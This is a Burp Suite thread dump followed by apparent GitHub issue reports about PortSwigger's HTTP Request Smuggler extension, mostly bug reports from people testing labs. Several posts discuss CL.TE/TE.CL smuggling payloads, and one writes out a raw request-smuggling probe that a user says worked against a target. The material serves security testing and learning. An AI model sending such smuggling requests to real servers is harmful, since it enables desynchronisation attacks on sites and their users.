    lock=java.lang.Object@4ff47ac7 owned by null (-1), cpu=48, user=43
        [email protected]/java.lang.Object.wait(Native Method)
        [email protected]/java.lang.Object.wait(Object.java:338)
        app//burp.e3t.run(Unknown Source)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

passive-worker-2
    native=false, suspended=false, block=21, wait=13
    lock=java.lang.Object@59b52f4d owned by null (-1), cpu=63, user=58
        [email protected]/java.lang.Object.wait(Native Method)
        [email protected]/java.lang.Object.wait(Object.java:338)
        app//burp.e3t.run(Unknown Source)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

passive-worker-3
    native=false, suspended=false, block=26, wait=18
    lock=java.lang.Object@388592eb owned by null (-1), cpu=97, user=91
        [email protected]/java.lang.Object.wait(Native Method)
        [email protected]/java.lang.Object.wait(Object.java:338)
        app//burp.e3t.run(Unknown Source)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

passive-worker-4
    native=false, suspended=false, block=30, wait=23
    lock=java.lang.Object@2f6ebd72 owned by null (-1), cpu=25, user=24
        [email protected]/java.lang.Object.wait(Native Method)
        [email protected]/java.lang.Object.wait(Object.java:338)
        app//burp.e3t.run(Unknown Source)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

passive-worker-5
    native=false, suspended=false, block=23, wait=21
    lock=java.lang.Object@4320d81a owned by null (-1), cpu=6, user=5
        [email protected]/java.lang.Object.wait(Native Method)
        [email protected]/java.lang.Object.wait(Object.java:338)
        app//burp.e3t.run(Unknown Source)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

passive-worker-6
    native=false, suspended=false, block=23, wait=24
    lock=java.lang.Object@339f5874 owned by null (-1), cpu=0, user=0
        [email protected]/java.lang.Object.wait(Native Method)
        [email protected]/java.lang.Object.wait(Object.java:338)
        app//burp.e3t.run(Unknown Source)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

passive-worker-7
    native=false, suspended=false, block=24, wait=24
    lock=java.lang.Object@27998626 owned by null (-1), cpu=7, user=6
        [email protected]/java.lang.Object.wait(Native Method)
        [email protected]/java.lang.Object.wait(Object.java:338)
        app//burp.e3t.run(Unknown Source)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

passive-worker-8
    native=false, suspended=false, block=24, wait=24
    lock=java.lang.Object@7d462a8a owned by null (-1), cpu=1, user=0
        [email protected]/java.lang.Object.wait(Native Method)
        [email protected]/java.lang.Object.wait(Object.java:338)
        app//burp.e3t.run(Unknown Source)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

passive-worker-9
    native=false, suspended=false, block=23, wait=24
    lock=java.lang.Object@38e3cd30 owned by null (-1), cpu=0, user=0
        [email protected]/java.lang.Object.wait(Native Method)
        [email protected]/java.lang.Object.wait(Object.java:338)
        app//burp.e3t.run(Unknown Source)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

passive-worker-10
    native=false, suspended=false, block=23, wait=24
    lock=java.lang.Object@71766ea0 owned by null (-1), cpu=0, user=0
        [email protected]/java.lang.Object.wait(Native Method)
        [email protected]/java.lang.Object.wait(Object.java:338)
        app//burp.e3t.run(Unknown Source)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

passive-worker-11
    native=false, suspended=false, block=23, wait=24
    lock=java.lang.Object@1a356e1e owned by null (-1), cpu=0, user=0
        [email protected]/java.lang.Object.wait(Native Method)
        [email protected]/java.lang.Object.wait(Object.java:338)
        app//burp.e3t.run(Unknown Source)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

pool-21-thread-1
    native=false, suspended=false, block=0, wait=20
    lock=java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject@566b05a8 owned by null (-1), cpu=8, user=6
        [email protected]/jdk.internal.misc.Unsafe.park(Native Method)
        [email protected]/java.util.concurrent.locks.LockSupport.parkNanos(LockSupport.java:252)
        [email protected]/java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject.awaitNanos(AbstractQueuedSynchronizer.java:1672)
        [email protected]/java.util.concurrent.ScheduledThreadPoolExecutor$DelayedWorkQueue.take(ScheduledThreadPoolExecutor.java:1182)
        [email protected]/java.util.concurrent.ScheduledThreadPoolExecutor$DelayedWorkQueue.take(ScheduledThreadPoolExecutor.java:899)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.getTask(ThreadPoolExecutor.java:1062)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1122)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

pool-18-thread-1
    native=false, suspended=false, block=0, wait=49
    lock=java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject@70c7c818 owned by null (-1), cpu=2, user=2
        [email protected]/jdk.internal.misc.Unsafe.park(Native Method)
        [email protected]/java.util.concurrent.locks.LockSupport.park(LockSupport.java:341)
        [email protected]/java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionNode.block(AbstractQueuedSynchronizer.java:506)
        [email protected]/java.util.concurrent.ForkJoinPool.unmanagedBlock(ForkJoinPool.java:3463)
        [email protected]/java.util.concurrent.ForkJoinPool.managedBlock(ForkJoinPool.java:3434)
        [email protected]/java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject.await(AbstractQueuedSynchronizer.java:1623)
        [email protected]/java.util.concurrent.LinkedBlockingQueue.take(LinkedBlockingQueue.java:435)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.getTask(ThreadPoolExecutor.java:1062)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1122)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

pool-20-thread-1
    native=false, suspended=false, block=7, wait=53
    lock=java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject@3286abce owned by null (-1), cpu=2, user=2
        [email protected]/jdk.internal.misc.Unsafe.park(Native Method)
        [email protected]/java.util.concurrent.locks.LockSupport.park(LockSupport.java:341)
        [email protected]/java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionNode.block(AbstractQueuedSynchronizer.java:506)
        [email protected]/java.util.concurrent.ForkJoinPool.unmanagedBlock(ForkJoinPool.java:3463)
        [email protected]/java.util.concurrent.ForkJoinPool.managedBlock(ForkJoinPool.java:3434)
        [email protected]/java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject.await(AbstractQueuedSynchronizer.java:1623)
        [email protected]/java.util.concurrent.ScheduledThreadPoolExecutor$DelayedWorkQueue.take(ScheduledThreadPoolExecutor.java:1170)
        [email protected]/java.util.concurrent.ScheduledThreadPoolExecutor$DelayedWorkQueue.take(ScheduledThreadPoolExecutor.java:899)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.getTask(ThreadPoolExecutor.java:1062)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1122)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

pool-project-thread-1
    native=false, suspended=false, block=0, wait=3
    lock=java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject@372761e owned by null (-1), cpu=4, user=4
        [email protected]/jdk.internal.misc.Unsafe.park(Native Method)
        [email protected]/java.util.concurrent.locks.LockSupport.park(LockSupport.java:341)
        [email protected]/java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionNode.block(AbstractQueuedSynchronizer.java:506)
        [email protected]/java.util.concurrent.ForkJoinPool.unmanagedBlock(ForkJoinPool.java:3463)
        [email protected]/java.util.concurrent.ForkJoinPool.managedBlock(ForkJoinPool.java:3434)
        [email protected]/java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject.await(AbstractQueuedSynchronizer.java:1623)
        [email protected]/java.util.concurrent.LinkedBlockingQueue.take(LinkedBlockingQueue.java:435)
        app//burp.eik.run(Unknown Source)
        [email protected]/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
        [email protected]/java.util.concurrent.FutureTask.run(FutureTask.java:264)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

pool-project-thread-2
    native=true, suspended=false, block=2, wait=6
    lock=null owned by null (-1), cpu=965, user=554
        [email protected]/sun.nio.ch.Net.poll(Native Method)
        [email protected]/sun.nio.ch.NioSocketImpl.park(NioSocketImpl.java:181)
        [email protected]/sun.nio.ch.NioSocketImpl.timedRead(NioSocketImpl.java:285)
        [email protected]/sun.nio.ch.NioSocketImpl.implRead(NioSocketImpl.java:309)
        [email protected]/sun.nio.ch.NioSocketImpl.read(NioSocketImpl.java:350)
        [email protected]/sun.nio.ch.NioSocketImpl$1.read(NioSocketImpl.java:803)
        [email protected]/java.net.Socket$SocketInputStream.read(Socket.java:966)
        app//burp.ba8.read(Unknown Source)
        [email protected]/sun.security.ssl.SSLSocketInputRecord.read(SSLSocketInputRecord.java:478)
        [email protected]/sun.security.ssl.SSLSocketInputRecord.readHeader(SSLSocketInputRecord.java:472)
        [email protected]/sun.security.ssl.SSLSocketInputRecord.bytesInCompletePacket(SSLSocketInputRecord.java:70)
        [email protected]/sun.security.ssl.SSLSocketImpl.readApplicationRecord(SSLSocketImpl.java:1455)
        [email protected]/sun.security.ssl.SSLSocketImpl$AppInputStream.read(SSLSocketImpl.java:1059)
        app//burp.f2p.a(Unknown Source)
        app//burp.f2p.b(Unknown Source)
        app//burp.cy6.lambda$run$0(Unknown Source)
        app//burp.cy6$$Lambda$1363/0x0000000800b85668.a(Unknown Source)
        app//burp.eun.a(Unknown Source)
        app//burp.cy6.run(Unknown Source)
        [email protected]/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
        [email protected]/java.util.concurrent.FutureTask.run(FutureTask.java:264)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

pool-project-thread-3
    native=true, suspended=false, block=4, wait=3
    lock=null owned by null (-1), cpu=5, user=4
        [email protected]/sun.nio.ch.Net.accept(Native Method)
        [email protected]/sun.nio.ch.NioSocketImpl.accept(NioSocketImpl.java:755)
        [email protected]/java.net.ServerSocket.implAccept(ServerSocket.java:675)
        [email protected]/java.net.ServerSocket.platformImplAccept(ServerSocket.java:641)
        [email protected]/java.net.ServerSocket.implAccept(ServerSocket.java:617)
        [email protected]/java.net.ServerSocket.implAccept(ServerSocket.java:574)
        [email protected]/java.net.ServerSocket.accept(ServerSocket.java:532)
        app//burp.gbt.run(Unknown Source)
        [email protected]/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
        [email protected]/java.util.concurrent.FutureTask.run(FutureTask.java:264)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

pool-project-thread-4
    native=true, suspended=false, block=573, wait=603
    lock=null owned by null (-1), cpu=287, user=271
        [email protected]/java.io.FileInputStream.readBytes(Native Method)
        [email protected]/java.io.FileInputStream.read(FileInputStream.java:276)
        [email protected]/java.io.BufferedInputStream.read1(BufferedInputStream.java:282)
        [email protected]/java.io.BufferedInputStream.read(BufferedInputStream.java:343)
        [email protected]/sun.nio.cs.StreamDecoder.readBytes(StreamDecoder.java:270)
        [email protected]/sun.nio.cs.StreamDecoder.implRead(StreamDecoder.java:313)
        [email protected]/sun.nio.cs.StreamDecoder.read(StreamDecoder.java:188)
        [email protected]/java.io.InputStreamReader.read(InputStreamReader.java:177)
        [email protected]/java.io.BufferedReader.fill(BufferedReader.java:162)
        [email protected]/java.io.BufferedReader.readLine(BufferedReader.java:329)
        [email protected]/java.io.BufferedReader.readLine(BufferedReader.java:396)
        app//net.portswigger.devtools.client.f.lambda$logProcessOutput$5(Unknown Source)
        app//net.portswigger.devtools.client.f$$Lambda$1313/0x0000000800aa61c8.run(Unknown Source)
        [email protected]/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
        [email protected]/java.util.concurrent.FutureTask.run(FutureTask.java:264)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

pool-project-thread-5
    native=false, suspended=false, block=0, wait=1
    lock=java.util.LinkedList@d3a659d owned by null (-1), cpu=0, user=0
        [email protected]/java.lang.Object.wait(Native Method)
        [email protected]/java.lang.Object.wait(Object.java:338)
        app//burp.chh.d(Unknown Source)
        app//burp.chh.run(Unknown Source)
        [email protected]/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
        [email protected]/java.util.concurrent.FutureTask.run(FutureTask.java:264)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

pool-project-thread-6
    native=false, suspended=false, block=833, wait=870
    lock=java.lang.ProcessImpl@43f3fb2a owned by null (-1), cpu=164, user=88
        [email protected]/java.lang.Object.wait(Native Method)
        [email protected]/java.lang.Object.wait(Object.java:338)
        [email protected]/java.lang.ProcessImpl.waitFor(ProcessImpl.java:434)
        app//net.portswigger.devtools.client.f.lambda$new$4(Unknown Source)
        app//net.portswigger.devtools.client.f$$Lambda$1314/0x0000000800aa63f0.run(Unknown Source)
        [email protected]/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
        [email protected]/java.util.concurrent.FutureTask.run(FutureTask.java:264)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

pool-project-thread-7
    native=false, suspended=false, block=0, wait=1
    lock=java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject@442ce041 owned by null (-1), cpu=0, user=0
        [email protected]/jdk.internal.misc.Unsafe.park(Native Method)
        [email protected]/java.util.concurrent.locks.LockSupport.park(LockSupport.java:341)
        [email protected]/java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionNode.block(AbstractQueuedSynchronizer.java:506)
        [email protected]/java.util.concurrent.ForkJoinPool.unmanagedBlock(ForkJoinPool.java:3463)
        [email protected]/java.util.concurrent.ForkJoinPool.managedBlock(ForkJoinPool.java:3434)
        [email protected]/java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject.await(AbstractQueuedSynchronizer.java:1623)
        [email protected]/java.util.concurrent.LinkedBlockingQueue.take(LinkedBlockingQueue.java:435)
        app//burp.eik.run(Unknown Source)
        [email protected]/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
        [email protected]/java.util.concurrent.FutureTask.run(FutureTask.java:264)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

pool-24-thread-1
    native=false, suspended=false, block=0, wait=780
    lock=java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject@54febc5c owned by null (-1), cpu=125, user=102
        [email protected]/jdk.internal.misc.Unsafe.park(Native Method)
        [email protected]/java.util.concurrent.locks.LockSupport.parkNanos(LockSupport.java:252)
        [email protected]/java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject.awaitNanos(AbstractQueuedSynchronizer.java:1672)
        [email protected]/java.util.concurrent.ScheduledThreadPoolExecutor$DelayedWorkQueue.take(ScheduledThreadPoolExecutor.java:1182)
        [email protected]/java.util.concurrent.ScheduledThreadPoolExecutor$DelayedWorkQueue.take(ScheduledThreadPoolExecutor.java:899)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.getTask(ThreadPoolExecutor.java:1062)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1122)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

pool-project-thread-8
    native=true, suspended=false, block=0, wait=1
    lock=null owned by null (-1), cpu=18, user=17
        [email protected]/java.io.FileInputStream.readBytes(Native Method)
        [email protected]/java.io.FileInputStream.read(FileInputStream.java:276)
        [email protected]/java.io.BufferedInputStream.read1(BufferedInputStream.java:282)
        [email protected]/java.io.BufferedInputStream.read(BufferedInputStream.java:343)
        [email protected]/sun.nio.cs.StreamDecoder.readBytes(StreamDecoder.java:270)
        [email protected]/sun.nio.cs.StreamDecoder.implRead(StreamDecoder.java:313)
        [email protected]/sun.nio.cs.StreamDecoder.read(StreamDecoder.java:188)
        [email protected]/java.io.InputStreamReader.read(InputStreamReader.java:177)
        [email protected]/java.io.BufferedReader.fill(BufferedReader.java:162)
        [email protected]/java.io.BufferedReader.readLine(BufferedReader.java:329)
        [email protected]/java.io.BufferedReader.readLine(BufferedReader.java:396)
        app//net.portswigger.devtools.client.f.lambda$logProcessOutput$5(Unknown Source)
        app//net.portswigger.devtools.client.f$$Lambda$1313/0x0000000800aa61c8.run(Unknown Source)
        [email protected]/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
        [email protected]/java.util.concurrent.FutureTask.run(FutureTask.java:264)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

process reaper
    native=true, suspended=false, block=0, wait=0
    lock=null owned by null (-1), cpu=0, user=0
        [email protected]/java.lang.ProcessHandleImpl.waitForProcessExit0(Native Method)
        [email protected]/java.lang.ProcessHandleImpl$1.run(ProcessHandleImpl.java:147)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

Keep-Alive-Timer
    native=false, suspended=false, block=0, wait=36
    lock=null owned by null (-1), cpu=2, user=1
        [email protected]/java.lang.Thread.sleep(Native Method)
        [email protected]/sun.net.www.http.KeepAliveCache.run(KeepAliveCache.java:191)
        [email protected]/java.lang.Thread.run(Thread.java:833)
        [email protected]/jdk.internal.misc.InnocuousThread.run(InnocuousThread.java:162)

pool-project-thread-10
    native=true, suspended=false, block=0, wait=0
    lock=null owned by null (-1), cpu=3, user=2
        [email protected]/sun.nio.ch.Net.poll(Native Method)
        [email protected]/sun.nio.ch.NioSocketImpl.park(NioSocketImpl.java:181)
        [email protected]/sun.nio.ch.NioSocketImpl.park(NioSocketImpl.java:190)
        [email protected]/sun.nio.ch.NioSocketImpl.implRead(NioSocketImpl.java:314)
        [email protected]/sun.nio.ch.NioSocketImpl.read(NioSocketImpl.java:350)
        [email protected]/sun.nio.ch.NioSocketImpl$1.read(NioSocketImpl.java:803)
        [email protected]/java.net.Socket$SocketInputStream.read(Socket.java:966)
        app//burp.ba8.read(Unknown Source)
        [email protected]/sun.security.ssl.SSLSocketInputRecord.read(SSLSocketInputRecord.java:478)
        [email protected]/sun.security.ssl.SSLSocketInputRecord.readHeader(SSLSocketInputRecord.java:472)
        [email protected]/sun.security.ssl.SSLSocketInputRecord.bytesInCompletePacket(SSLSocketInputRecord.java:70)
        [email protected]/sun.security.ssl.SSLSocketImpl.readApplicationRecord(SSLSocketImpl.java:1455)
        [email protected]/sun.security.ssl.SSLSocketImpl$AppInputStream.read(SSLSocketImpl.java:1059)
        app//net.portswigger.ee.e(Unknown Source)
        app//net.portswigger.ee.a(Unknown Source)
        app//net.portswigger.ey.a(Unknown Source)
        app//net.portswigger.ey.run(Unknown Source)
        [email protected]/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
        [email protected]/java.util.concurrent.FutureTask.run(FutureTask.java:264)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

pool-project-thread-11
    native=true, suspended=false, block=0, wait=0
    lock=null owned by null (-1), cpu=6, user=4
        [email protected]/sun.nio.ch.Net.poll(Native Method)
        [email protected]/sun.nio.ch.NioSocketImpl.park(NioSocketImpl.java:181)
        [email protected]/sun.nio.ch.NioSocketImpl.park(NioSocketImpl.java:190)
        [email protected]/sun.nio.ch.NioSocketImpl.implRead(NioSocketImpl.java:314)
        [email protected]/sun.nio.ch.NioSocketImpl.read(NioSocketImpl.java:350)
        [email protected]/sun.nio.ch.NioSocketImpl$1.read(NioSocketImpl.java:803)
        [email protected]/java.net.Socket$SocketInputStream.read(Socket.java:966)
        [email protected]/sun.security.ssl.SSLSocketInputRecord.read(SSLSocketInputRecord.java:478)
        [email protected]/sun.security.ssl.SSLSocketInputRecord.readHeader(SSLSocketInputRecord.java:472)
        [email protected]/sun.security.ssl.SSLSocketInputRecord.bytesInCompletePacket(SSLSocketInputRecord.java:70)
        [email protected]/sun.security.ssl.SSLSocketImpl.readApplicationRecord(SSLSocketImpl.java:1455)
        [email protected]/sun.security.ssl.SSLSocketImpl$AppInputStream.read(SSLSocketImpl.java:1059)
        app//net.portswigger.ee.e(Unknown Source)
        app//net.portswigger.ee.a(Unknown Source)
        app//net.portswigger.ey.a(Unknown Source)
        app//net.portswigger.ey.run(Unknown Source)
        [email protected]/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
        [email protected]/java.util.concurrent.FutureTask.run(FutureTask.java:264)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

Timeout option not working

It seems like the timeout setting is not working i set it to 10 but it does not have any effect on the waiting time.

Issue not showing in dashboard

Hi,

i'm using burp pro and learning through the awesome web academy. When i launch smuggle probe against the first lab, as described in project readme, i correctly find the requests causing the smuggling in flow tab (with "Unrecognized method XPOST" in response), but no issue appears in dashboard or in the extender output (only 'completed 1 of 1').
I'm pretty sure this is due to an error of mine, as i'm still a newbie, but any help would be greatly appreciated !

Thanks for your awesome tools

yongicobay

Unable to locate 'Desynchronize' extension.

The Readme suggests the following practice step:

"Use the Extender->BApp store tab to install the 'Desynchronize' extension."

I don't see this extension listed..?

flow tab not showing

hi,
just tried this plugn, and the flow tab is not showing, so can t be used.
using 2.1.03 beta

best regards

Turbo Intruder Attacks Queue But Never Launch

Not sure if something has changed recently with the script that the plugin inserts into turbo intruder but when I click 'Launch CL.TE/TE.CL attack' I can see the engine starting and the requests queueing but no requests are actually made. Have tried this on multiple lab instances, on 2 different machines with 2 different versions of Burp and consistently get this bug. Have watched plenty of YT videos in which they follow the exact same steps and the requests launch no problem. Screenshots of script and queue attached.

Extension output says:

"The engine has already started - you no longer need to invoke engine.start() manually. If you prefer to invoke engine.start() manually, set autoStart=False in the constructor
Cancelled attack
Attack aborted with items waiting to be queued."

No requests in Logger++

The same problem as #50 closed issue.

I'm having the same problem.

Why Smuggle attack(TE.CL) could change my content-length auomatically??

Hi , I am getting a trouble right now. my original request packet in my repeater is

you can see the content-length is 4 clearly, but when I put it in Smuggle attack(TE,CL), This field has been changed.

How can I solve this problem? Firstly I try to modify python script on turbo intruder, but it doesn't matter. No matter how I change it, it's still going to change itself automatically.

Not able to get "404" status code after smuggling the attack through (TE.CL & CE.TL)?

Burp throws one issue that "http://redacted.com" vulnerable to "HTTP Request Smuggling" but when I am trying to Smuggle the attack (TE.CL & CE.TL) no "404" status in the response.

Burp trying to exploits this by different smuggling techniques.
{HTTP Request Smuggling: CL.TE aposed (delayed response)}
{HTTP Request Smuggling: CL.TE quoted (delayed response)}
{HTTP Request Smuggling: TE.CL 0dwrap}
{HTTP Request Smuggling: CL.TE gareth1}
{HTTP Request Smuggling: CL.TE aposed left-alive}
{HTTP Request Smuggling: CL.TE nested left-alive}
{HTTP Request Smuggling: CL.TE quoted left-alive}
{HTTP Request Smuggling: CL.TE suffix1:127 left-alive}
{HTTP Request Smuggling: CL.TE spacefix1:127 left-alive}

is it vulnerable to this attack?

Thanks

Add option to use Engine.BURP to enable proxy support

When testing in an IP restricted setting it would be handy to be able to switch the engine to Engine.BURP to use an existing project upstream proxy with http request smuggler.

Is this something that you would consider as an option for the default extension build?

Window resizing for "Attack Config" not enabled.

The window "Attack Config" when produced by clicking on "Launch Smuggle probe" can't be resized.

"Smuggle attack" uses "Connection: keep-alive" even when issue was detected with "Connection: close"

Hi!

I'm not quite sure if this is intended, but I've noticed that all attacks launched through the "Smuggle attack" option will issue requests with "Connection: keep-alive", even if the original detection mentions "closed" as a requirement.

Steps to reproduce:

Scan any target that produces a finding ending in closed
Right-click the issue -> Smuggle Attack -> Attack
Notice that the attack request contains a "Connection: keep-alive" header

Is this something that could impact findings, or is it intended/unimportant?

Thanks,
Alex

The CL.TE attack payload is missing a newline character

When using CL.TE to attack the module, I found that there is only one newline after the 0 terminator of the data block, and it should be two newlines under normal circumstances.

Provide option to stop hostname resolution check

I'm running into an issue where the HTTP request smuggler extension will fail to run because it cannot resolve the hostname.

The host I'm testing can only be accessed through a proxy so I'm not 100% sure how the DNS resolves requests. Every request in the burp proxy history shows "unknown host", but everything works fine. I can usually bypass this issue resolution error with extensions like turbo intruder, but this one simply fails and quits.

Providing some options to stop this check would be great! Maybe I'm missing something in the settings as well, any help is appreciated!

Scan for smuggling attacks

I am trying to use HTTP to request a smuggler to test a CL.TE experiment, but I can't scan for smuggling

Launch Smuggle Attack only loads TL-CE.py

Hey I tried looking in the docs to see if there was a way to change this, apologies if I missed it-

Working through the labs and was testing out the CE-TL and couldnt figure out why it wasn't returning a 404. Finally realized the smuggle attack option from repeater defaults to the TL-CE.py script. To use CE-TL I had to manually copy paste in the source from the repo.

Is that the current expected behavior? Is there a way to switch through Burp?

Attack config window too large

on some pc versions if yu right click and launch smuggle probe the UI will be bigger than the computer
screen hance unusable .if yu will try to right click on the tab they is no minimisation option

Load errors after compilation

Burp scanner vs http request smuggler plugin

Hi @albinowax,

I have managed to exploit an http request smuggling but I have noticed a difference between the burp scanner (version pro) and the http request smuggler plugin.

Running the plugin, nothing is detected whereas running burp scanner, it detects well the vulnerability.

I have checked the difference between both using logger++.

The working request uses this pattern:

POST / HTTP/1.1
 Transfer-Encoding: chunked
Host: www.host.com
Content-Length: 5

1
Z
Q

This one works and is well detected by the Burp scanner. However, any modification of this pattern affects the result. For example, if you inverse the Transfer-Encoding and Host http header, does not work anymore.

POST / HTTP/1.1
Host: www.host.com
 Transfer-Encoding: chunked
....

